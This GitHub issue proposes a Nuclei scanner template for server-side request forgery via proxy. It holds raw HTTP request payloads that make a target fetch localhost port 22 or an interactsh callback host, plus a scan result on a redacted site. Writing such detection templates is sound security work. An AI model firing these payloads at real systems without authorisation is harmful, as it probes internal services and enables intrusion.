### ISSUE TITLE
ssrf-by-proxy-unsafe

### ISSUE THREAD

**Issue by dhd0004** [projectdiscovery/nuclei-templates#6789]
### Template Information:

Based on https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
This template uses "unsafe" for raw request. Aditional check for port 22 in localhost.

### Nuclei Template:

```yaml
id: ssrf-by-proxy-unsafe

info:
  name: SSRF via Proxy unsafe
  author: petergrifin
  severity: high

requests:
  - payloads:
      verb:
        - GET
        - HEAD
        - POST
        - PUT
        - DELETE
        - CONNECT
        - OPTIONS
        - TRACE
        - PATCH

    raw:

      - |+
        {{verb}} http://127.0.0.1:22/ HTTP/1.1
        Host: {{Hostname}}

      - |+
        {{verb}} http://{{interactsh-url}}/#{{verb}} HTTP/1.1
        Host: {{Hostname}}

      - |+
        {{verb}} {{BaseURL}}/#{{verb}} HTTP/1.1
        Host: {{interactsh-url}}

      - |+
        {{verb}} /http://{{interactsh-url}}/#{{verb}} HTTP/1.1
        Host: {{Hostname}}

      - |+
        {{verb}} /{{BaseURL}}@{{interactsh-url}}/#{{verb}} HTTP/1.1
        Host: {{Hostname}}

      - |+
        {{verb}} http%3A%2F%2F{{interactsh-url}}%2F%23{{verb}} HTTP/1.1
        Host: {{Hostname}}

      - |+
        {{verb}} /http%3A%2F%2F{{interactsh-url}}%2F%23{{verb}} HTTP/1.1
        Host: {{Hostname}}

      - |+
        {{verb}} /{{url_encode('{{BaseURL}}@{{interactsh-url}}/#{{verb}}')}} HTTP/1.1
        Host: {{Hostname}}

    unsafe: true

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or
      - type: word
        part: body
        words:
          - "ssh"
          - "OpenSSH"
        condition: or
```
Results
```bash
nuclei -u https://redacted.com -id ssrf-by-proxy-unsafe                                                                                                     23/02 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.8.9

                projectdiscovery.io

[INF] Using Nuclei Engine 2.8.9 (latest)
[INF] Using Nuclei Templates 9.3.7 (latest)
[INF] Templates added in last update: 58
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[ssrf-by-proxy-unsafe] [http] [high] https://redacted.com/http:/127.0.0.1:22 [verb="GET"]

```
